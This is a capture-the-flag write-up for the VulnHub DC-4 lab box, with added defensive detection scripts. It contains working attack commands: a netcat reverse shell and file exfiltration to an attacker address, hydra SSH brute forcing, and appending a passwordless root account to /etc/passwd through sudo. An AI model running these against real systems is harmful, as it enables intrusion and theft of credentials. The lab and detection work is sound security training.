DC series boxes 4/9
Main content: brute-forcing the login form with Burp Suite, command execution (RCE) by editing a captured request, reverse shell, SSH brute-force with hydra, privilege escalation through teehee
Official download: https://www.vulnhub.com/entry/dc-4,313/
Author's download page: https://www.five86.com/dc-4.html
Box description:
Information gathering
Host discovery
arp-scan -l
192.168.1.186
Port scan
nmap -sS -p- -A 192.168.1.186
Ports 22 and 80 are open.
Also run nmap's built-in vulnerability scripts:
nmap --script=vuln 192.168.1.186
It reports a CSRF issue, which is of no use here.
The web page is a login form; nothing interesting in the source.
Brute force
Brute-forced credentials:
admin/happy
After logging in to the admin area there is a command-execution feature.
Command execution vulnerability (RCE)
Intercept the request and change the command:
whoami
It executes successfully.
Finding users
Run cat /etc/passwd and find three users: charles, jim, sam
Reverse shell
kali:
nc -lvnp 2333
target:
nc -e /bin/bash 192.168.1.101 2333
Use python to upgrade to an interactive shell:
python -c "import pty;pty.spawn('/bin/bash')"
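From the defender's side, the chain above (web RCE, then a reverse shell from the web-server user) is visible in the process table: nginx or php-fpm workers running as www-data should never have a shell or nc as a child. The check below is an added example and not part of the original walkthrough; the ps listing, the function names and the list of suspect commands are constructed assumptions of this example.

```shell
# Added example, not part of the DC-4 walkthrough. Audits a `ps`-style
# listing for processes of the web-server user that are shells or network
# tools, which is what a web RCE followed by a reverse shell looks like from
# the host side. The listing below is constructed for this example, in the
# column layout of `ps -eo user,pid,ppid,comm,args`.

SAMPLE_PS='USER       PID  PPID COMMAND         ARGS
root       412     1 nginx           nginx: master process /usr/sbin/nginx
www-data   415   412 nginx           nginx: worker process
www-data   418   412 php-fpm7.0      php-fpm: pool www
www-data  2201   418 sh              sh -c nc -e /bin/bash 192.168.1.101 2333
www-data  2202  2201 nc              nc -e /bin/bash 192.168.1.101 2333
www-data  2203  2202 bash            /bin/bash
jim       2310  2300 bash            -bash'

# Interpreters and network clients a web worker has no business running
# (assumed list; extend it for your environment).
SUSPECT_COMM='^(sh|bash|dash|nc|ncat|netcat|socat|python[0-9.]*|perl|php)$'

# Usage: suspicious_web_procs "$ps_listing" [user]
# Prints "pid ppid comm" for each matching process of that user (default www-data).
suspicious_web_procs() {
    printf '%s\n' "$1" | awk -v u="${2:-www-data}" -v re="$SUSPECT_COMM" '
        NR > 1 && $1 == u && $4 ~ re { print $2, $3, $4 }'
}

# Usage: count_suspicious_web_procs "$ps_listing" [user]
# Returns the number of findings on stdout, so it can drive an alert threshold.
count_suspicious_web_procs() {
    suspicious_web_procs "$1" "${2:-www-data}" | wc -l | tr -d ' '
}

# Demo run on the constructed listing; on a live host use
#   suspicious_web_procs "$(ps -eo user,pid,ppid,comm,args)"
suspicious_web_procs "$SAMPLE_PS"
```

On the sample this prints the three processes 2201, 2202 and 2203 (sh, nc and bash under www-data) and nothing for jim's ordinary login shell, because the filter is scoped to the web-server account. The parent-PID column is printed so the chain back to the php-fpm worker (418) can be followed.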
Look around
www-data@dc-4:/usr/share/nginx/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dc-4:/usr/share/nginx/html$ ls
ls
command.php css images index.php login.php logout.php
www-data@dc-4:/usr/share/nginx/html$ cd /home
cd /home
www-data@dc-4:/home$ ls
ls
charles jim sam
www-data@dc-4:/home$ ls -lah charles
ls -lah charles
total 20K
drwxr-xr-x 2 charles charles 4.0K Apr 7 2019 .
drwxr-xr-x 5 root root 4.0K Apr 7 2019 ..
-rw-r--r-- 1 charles charles 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 charles charles 3.5K Apr 6 2019 .bashrc
-rw-r--r-- 1 charles charles 675 Apr 6 2019 .profile
www-data@dc-4:/home$ ls -lah jim
ls -lah jim
total 32K
drwxr-xr-x 3 jim jim 4.0K Apr 7 2019 .
drwxr-xr-x 5 root root 4.0K Apr 7 2019 ..
-rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 jim jim 3.5K Apr 6 2019 .bashrc
-rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile
drwxr-xr-x 2 jim jim 4.0K Apr 7 2019 backups
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwxrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
test.sh has wide-open permissions (777); not sure yet whether it can be used.
www-data@dc-4:/home$ ls -lah sam
ls -lah sam
total 20K
drwxr-xr-x 2 sam sam 4.0K Apr 7 2019 .
drwxr-xr-x 5 root root 4.0K Apr 7 2019 ..
-rw-r--r-- 1 sam sam 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 sam sam 3.5K Apr 6 2019 .bashrc
-rw-r--r-- 1 sam sam 675 Apr 6 2019 .profile
www-data@dc-4:/home$ cat jim/mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
www-data@dc-4:/home$ ls -lah jim/backups
ls -lah jim/backups
total 12K
drwxr-xr-x 2 jim jim 4.0K Apr 7 2019 .
drwxr-xr-x 3 jim jim 4.0K Apr 7 2019 ..
-rw-r--r-- 1 jim jim 2.0K Apr 7 2019 old-passwords.bak
Found what looks like useful information.
Exfiltrate old-passwords.bak
kali:
nc -lvnp 2334 > old-passwords.txt
target:
nc 192.168.1.101 2334 < jim/backups/old-passwords.bak
Brute-force the SSH password with hydra
Since the wordlist from the previous step was found in jim's directory, use it against jim.
hydra -l jim -P old-passwords.txt ssh://192.168.1.186
got jim/jibril04
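Hydra's guessing leaves a dense run of "Failed password" lines in the SSH auth log, followed by an "Accepted password" from the same source once the wordlist hits. The script below is an added example, not part of the original walkthrough; the auth.log lines are constructed, and the function names and the default threshold of three failures are assumptions of the example.

```shell
# Added example, not part of the DC-4 walkthrough: spot an SSH password
# brute-force in auth.log-style lines. The log lines below are constructed.

SAMPLE_AUTH_LOG='Apr  7 10:00:01 dc-4 sshd[1201]: Failed password for jim from 192.168.1.101 port 40112 ssh2
Apr  7 10:00:01 dc-4 sshd[1202]: Failed password for jim from 192.168.1.101 port 40114 ssh2
Apr  7 10:00:02 dc-4 sshd[1203]: Failed password for invalid user admin from 192.168.1.101 port 40116 ssh2
Apr  7 10:00:02 dc-4 sshd[1204]: Failed password for jim from 192.168.1.101 port 40118 ssh2
Apr  7 10:00:03 dc-4 sshd[1205]: Accepted password for jim from 192.168.1.101 port 40120 ssh2
Apr  7 10:05:00 dc-4 sshd[1300]: Failed password for charles from 192.168.1.50 port 51000 ssh2'

# Usage: ssh_bruteforce_sources "$log_text" [threshold]
# Prints "count ip" for every source with at least <threshold> failures
# (default 3, an assumed value; tune it to your baseline).
ssh_bruteforce_sources() {
    threshold=${2:-3}
    printf '%s\n' "$1" | awk -v t="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # the source address is the token after "from"
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= t) print fails[ip], ip }'
}

# Usage: guessed_logins "$log_text"
# Prints "ip user" for every successful login that came from a source which
# had already failed at least once: a password that was guessed, not mistyped.
guessed_logins() {
    printf '%s\n' "$1" | awk '
        /sshd\[[0-9]+\]: (Failed|Accepted) password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i+1); break }
            if ($0 ~ /Failed password/) {
                fails[ip]++
            } else if (fails[ip] > 0) {
                for (i = 1; i <= NF; i++) if ($i == "for") { user = $(i+1); break }
                print ip, user
            }
        }'
}

# Demo on the constructed lines; on a live host feed it the real log:
#   ssh_bruteforce_sources "$(cat /var/log/auth.log)"
ssh_bruteforce_sources "$SAMPLE_AUTH_LOG"
guessed_logins "$SAMPLE_AUTH_LOG"
```

On the sample, 192.168.1.101 is reported with four failures and then again as the source of a guessed login for jim, while the single failure from 192.168.1.50 stays below the threshold. The second function is the more useful alert: a burst of failures is noise on any internet-facing host, but a success right after one from the same address is the moment a credential stopped being secret.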
SSH login
Getting another password
Almost missed the hint: You have mail.
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
Got user charles's password: ^xHhA&hvim0y
Privilege escalation
Switch to user charles and run sudo -l. It shows that teehee can be run as root without a password.
It can be used to write to files; the -a flag appends instead of overwriting.
echo "test1::0:0:root:/root:/bin/bash"|sudo teehee -a /etc/passwd
The second field is empty (no password), and uid 0 gives root privileges.
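The teehee step works because sudo lets it append to /etc/passwd, and it leaves a very specific trace: a passwd line with an empty password field and a second uid 0 account. The checks below are an added example and not part of the walkthrough; the passwd lines and the sudo -l output are constructed samples, and the function names are assumptions of the example.

```shell
# Added example, not part of the DC-4 walkthrough. Two checks a defender can
# run after reading the privilege-escalation step:
#  1. audit_passwd: find passwd-format lines with an empty password field or
#     a second UID-0 account (what appending through teehee leaves behind)
#  2. nopasswd_sudo_rules: list NOPASSWD entries in `sudo -l` style output
# Both samples are constructed for this example.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1001:1001:,,,:/home/jim:/bin/bash
test1::0:0:root:/root:/bin/bash'

SAMPLE_SUDO_L='Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee'

# Usage: audit_passwd "$passwd_text"
# Prints one finding per line; returns 1 if anything was found, 0 if clean.
audit_passwd() {
    printf '%s\n' "$1" | awk -F: '
        NF != 7 { printf "malformed (%d fields): %s\n", NF, $0; bad = 1; next }
        $3 == 0 && $1 != "root" { printf "extra uid-0 account: %s\n", $1; bad = 1 }
        $2 == "" { printf "empty password field: %s\n", $1; bad = 1 }
        END { exit bad }'
}

# Usage: nopasswd_sudo_rules "$sudo_l_text"
# Prints "runas command" for every NOPASSWD rule.
nopasswd_sudo_rules() {
    printf '%s\n' "$1" | awk '
        /NOPASSWD:/ {
            runas = $1; sub(/^\(/, "", runas); sub(/\)$/, "", runas)
            sub(/.*NOPASSWD:[ \t]*/, "")
            print runas, $0
        }'
}

# Demo on the constructed samples; on a live host use
#   audit_passwd "$(cat /etc/passwd)"; nopasswd_sudo_rules "$(sudo -l)"
audit_passwd "$SAMPLE_PASSWD"
nopasswd_sudo_rules "$SAMPLE_SUDO_L"
```

On the sample, audit_passwd reports test1 twice (extra uid-0 account and empty password field) and exits 1, while a stock passwd with only root at uid 0 exits 0. The sudo check prints "root /usr/bin/teehee": any NOPASSWD rule for a program that can write to arbitrary files is equivalent to handing out root, so the fix is to remove the rule, and a file-integrity check on /etc/passwd catches the appended line if it is ever used.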
got root
Flag
root@dc-4:/home/charles# cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Summary
Scan the ports and note them down
Brute-force the login credentials with Burp Suite
Modify the request in Burp Suite to execute commands, reverse shell with nc
Look around for anything exploitable
Get the wordlist and brute-force SSH with hydra
Find another account's password in the mailbox
Find the command that runs as root without a password: teehee
Use teehee to create a passwordless root user
Get the highest-privilege user
get flag
Bonus
www-data@dc-4:/home$ cat jim/test.sh
cat jim/test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
That's all.